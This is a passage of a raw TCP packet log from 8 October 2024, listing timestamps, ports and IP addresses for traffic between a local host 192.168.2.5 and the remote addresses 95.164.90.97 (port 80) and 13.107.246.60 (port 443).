Oct 8, 2024 20:47:25.305548906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305553913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305588961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305598974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305634022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305640936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305666924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305670023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305701017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305702925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305732012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305741072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305764914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305769920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305807114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305815935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305849075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305854082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305881023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305881023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305913925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.305917025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.305954933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.321691990 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.322304964 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.322328091 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.322832108 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.322835922 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.339210987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339276075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339323997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339361906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339365959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339375019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339401960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339509964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339519978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339529991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339541912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339545965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339575052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339735985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339745998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339755058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339766979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339778900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339778900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339791059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339796066 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339804888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339814901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339818954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339827061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.339844942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.339859009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340186119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340197086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340207100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340217113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340226889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340234041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340236902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340248108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340257883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340269089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340270996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340280056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340289116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340291977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340301991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340312004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340328932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340347052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340692043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340703011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340713024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340723991 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340732098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340738058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340749025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340754032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340759993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340770006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340780020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340785980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340790987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340804100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.340810061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340825081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.340836048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341221094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341231108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341250896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341260910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341269970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341270924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341281891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341281891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341293097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341301918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341303110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341311932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341325998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341326952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341336966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341342926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341351032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341362000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341372967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341372967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341387033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341388941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341398954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341402054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341424942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341434956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341702938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341712952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341742992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341758966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341845989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341856003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341870070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341877937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341880083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341892958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341893911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341905117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341907978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341914892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341926098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341928005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341936111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341942072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341947079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341957092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341965914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.341967106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.341981888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342003107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342223883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342233896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342245102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342258930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342273951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342287064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342317104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342328072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342346907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342356920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342358112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342367887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342377901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342381954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342387915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342400074 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342406034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342408895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342420101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342420101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342428923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342443943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342467070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342803955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342816114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342825890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342839956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342847109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342850924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342863083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342864037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342873096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.342890978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.342912912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.343012094 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.343082905 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.343216896 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.343620062 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.343632936 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.343641996 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.343647003 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.343718052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343770027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343780994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343813896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.343872070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343882084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343892097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343902111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.343913078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.343926907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.343947887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.346529007 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.346559048 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.346607924 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.346730947 CEST	49795	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.346735001 CEST	443	49795	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.402164936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402178049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402188063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402229071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.402255058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.402308941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402318954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402328014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402339935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.402355909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.402380943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.405550003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405603886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405612946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405644894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.405658960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.405702114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405713081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405721903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405734062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405749083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.405771971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.405808926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.405852079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.426794052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426815987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426826000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426847935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.426863909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.426920891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426932096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426942110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426953077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.426970005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.426985979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427190065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427200079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427210093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427222013 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427232027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427242041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427242041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427253008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427263975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427264929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427273989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427278042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427299023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427309990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427611113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427669048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427772999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427824974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427826881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427860022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427870989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427892923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427903891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427926064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427936077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.427958012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.427998066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428010941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428033113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428045034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428065062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428098917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428122044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428131104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428153038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428164005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428173065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428196907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428206921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428234100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428267002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428277969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428299904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428309917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428333044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428340912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428369999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428416967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428541899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428575993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428606987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428616047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428639889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428648949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428672075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428683996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428705931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428715944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428739071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428749084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428771973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428781033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428807974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.428814888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428853035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.428973913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429004908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429023981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429037094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429045916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429069996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429102898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429102898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429121017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429135084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429141045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429167986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429177046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429205894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429234982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429245949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429425001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429456949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429481030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429497004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429505110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429531097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429542065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429563046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429569006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429594994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429606915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429627895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429637909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429660082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429671049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429692984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429707050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.429724932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429759026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.429768085 CEST	49755	80	192.168.2.5	95.164.90.97
